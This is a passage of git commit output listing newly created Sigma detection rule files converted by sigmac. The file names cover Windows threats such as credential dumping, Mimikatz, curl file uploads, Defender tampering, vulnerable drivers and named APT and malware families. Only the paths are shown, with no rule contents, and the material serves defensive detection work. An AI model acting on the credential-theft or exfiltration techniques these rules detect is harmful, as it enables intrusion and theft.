tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_sliver.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_install_uncommon.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_susp_service_installation_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml create mode 
100644 tools/sigmac/converted_rules/builtin/system/service_control_manager/win_system_susp_service_installation_script.yml create mode 100644 tools/sigmac/converted_rules/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml create mode 100644 tools/sigmac/converted_rules/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml create mode 100644 tools/sigmac/converted_rules/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml create mode 100644 tools/sigmac/converted_rules/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_module/posh_pm_susp_netfirewallrule_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_compress_archive_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_mailbox_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_new_smbmapping_quic.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_registry_reconnaissance.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_remove_item_path.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_functions_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_library_access.yml create mode 100644 
tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_curl_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_curl_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_net_quic.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml create mode 100644 
tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_susp_event_log_query.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_susp_file_permission_modifications.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_taskkill_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/process_creation/proc_creation_win_wmic_recon_system_info.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/registry/registry_event/registry_event_scheduled_task_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/registry/registry_set/registry_set_office_trusted_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/registry/registry_set/registry_set_powershell_crypto_namespace.yml create mode 100644 tools/sigmac/converted_rules/builtin/threat-hunting/security/win_security_scheduled_task_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/posh_ps_cl_invocation_lolscript_count.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/posh_ps_cl_mutexverifiers_lolscript_count.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/proc_creation_win_correlation_apt_silence_downloader_v3.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/proc_creation_win_correlation_apt_turla_commands_medium.yml create mode 100644 
tools/sigmac/converted_rules/builtin/unsupported/proc_creation_win_correlation_dnscat2_powershell_implementation.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/proc_creation_win_correlation_multiple_susp_cli.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/proc_creation_win_correlation_susp_builtin_commands_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_access_fake_files_with_stored_credentials.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_mal_service_installs.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_remote_schtask.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_global_catalog_enumeration.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_rare_schtasks_creations.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_explicit_credentials.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source2.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos.yml create mode 100644 
tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos2.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos3.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm2.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_failed_remote_logons_single_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_multiple_files_renamed_or_deleted.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_security_susp_samr_pwset.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_susp_failed_hidden_share_mount.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_system_rare_service_installs.yml create mode 100644 tools/sigmac/converted_rules/builtin/unsupported/win_taskscheduler_rare_schtask_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/win_alert_mimikatz_keywords.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_antimalware_platform_expired.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_asr_lsass_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_asr_psexec_wmi.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_config_change_exclusion_added.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_config_change_sample_submission_consent.yml create mode 100644 
tools/sigmac/converted_rules/builtin/windefend/win_defender_history_delete.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_malware_detected_amsi_source.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_real_time_protection_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_real_time_protection_errors.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_restored_quarantine_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_suspicious_features_tampering.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_tamper_protection_trigger.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_threat.yml create mode 100644 tools/sigmac/converted_rules/builtin/windefend/win_defender_virus_scan_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/wmi/win_wmi_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_keepass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_loadlibrary.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_powershell_lsass.yml create mode 
100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_ttdinjec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_ads_executable.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_creation_internet_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_hktl_generic_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_susp_ip_domains.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_winget_susp_package_source.yml create mode 100644 tools/sigmac/converted_rules/sysmon/create_stream_hash/create_stream_hash_zip_tld_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/create_remote_thread_win_susp_remote_thread_target.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_mal_creddumper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_mal_poortry_driver.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_powershell_script_installed_as_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_vuln_avast_anti_rootkit_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_vuln_dell_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_vuln_drivers_names.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_vuln_gigabyte_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_vuln_hw_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/driver_load_win_vuln_lenovo_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/file_event_win_hktl_createminidump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/file_event_win_lsass_memory_dump_file_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/file_event_win_mimikatz_memssp_log_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/file_event_win_susp_clr_logs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/image_load_alternate_powershell_hosts_moduleload.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/image_load_side_load_advapi32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/image_load_side_load_scm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/image_load_side_load_svchost_dlls.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/image_load_susp_winword_wmidll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/net_connection_win_binary_github_com.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/pipe_created_psexec_pipes_artifacts.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/deprecated/proc_access_win_in_memory_assembly_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_access_win_lazagne_cred_dump_lsass_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_access_win_lsass_susp_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_access_win_pypykatz_cred_dump_lsass_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_apt29_thinktanks.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_dragonfly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_gallium.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_hurricane_panda.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_lazarus_loader.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_apt_ta505_dropper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_certutil_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_cmd_read_contents.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_cmd_redirect_to_stream.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_cscript_vbs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml create 
mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_indirect_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_lolbin_findstr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_lolbin_office.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_lolbins_by_office_applications.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_mal_ryuk.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_mavinject_proc_inj.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_msdt_diagcab.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_new_service_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_odbcconf_susp_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_possible_applocker_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_base64_shellcode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_bitsjob.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_service_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_powershell_xor_encoded_command.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_reg_dump_sam.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_regsvr32_anomalies.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_renamed_paexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_renamed_powershell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_renamed_psexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_renamed_rundll32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_root_certificate_installed.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_run_from_zip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_sc_delete_av_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_schtasks_user_temp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_service_stop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_susp_bitstransfer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_susp_commandline_chars.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_susp_lolbin_non_c_drive.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_susp_run_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_susp_squirrel_lolbin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_sysinternals_psexec_service_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_sysinternals_psexesvc_start.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_whoami_as_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_winword_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_wmic_execution_via_office_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_wmic_remote_command.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_wmic_remote_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/proc_creation_win_wuauclt_execution.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/deprecated/process_creation_syncappvpublishingserver_exe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_add_sysinternals_sdelete_registry_keys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_event_asep_reg_keys_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_set_abusing_windows_telemetry_for_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_set_add_hidden_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_set_disable_microsoft_office_security_features.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_set_office_security.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/registry_set_silentprocessexit.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/sysmon_dcom_iertutil_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/sysmon_mimikatz_detection_lsass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/sysmon_powershell_execution_moduleload.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/sysmon_rclone_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/win_dsquery_domain_trust_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/win_susp_esentutl_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/win_susp_rclone_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/deprecated/win_susp_vssadmin_ntds_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_anonymfiles_com.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_appinstaller.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_cloudflared_communication.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_devtunnels_communication.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_mal_cobaltstrike.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_mega_nz.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_regsvr32_dns_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_susp_external_ip_lookup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_tor_onion_domain_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_ufile_io_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/dns_query/dns_query_win_vscode_tunnel_communication.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_mal_drivers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_mal_drivers_names.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_pua_process_hacker.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_pua_system_informer.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_susp_temp_use.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_vuln_drivers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_vuln_drivers_names.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_vuln_hevd_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_vuln_winring0_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/driver_load/driver_load_win_windivert.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Malware/Hancitor/proc_access_win_malware_verclsid_shellcode.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/TA/Dragonfly/proc_creation_win_apt_ta17_293a_ps.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/TA/Lazarus/proc_creation_win_apt_lazarus_binary_masquerading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2017/TA/Turla/pipe_created_apt_turla_named_pipes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/Malware/Elise-Backdoor/proc_creation_win_malware_elise.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/APT27/proc_creation_win_apt_apt27_emissary_panda.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/APT28/proc_creation_win_apt_sofacy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml create mode 100644 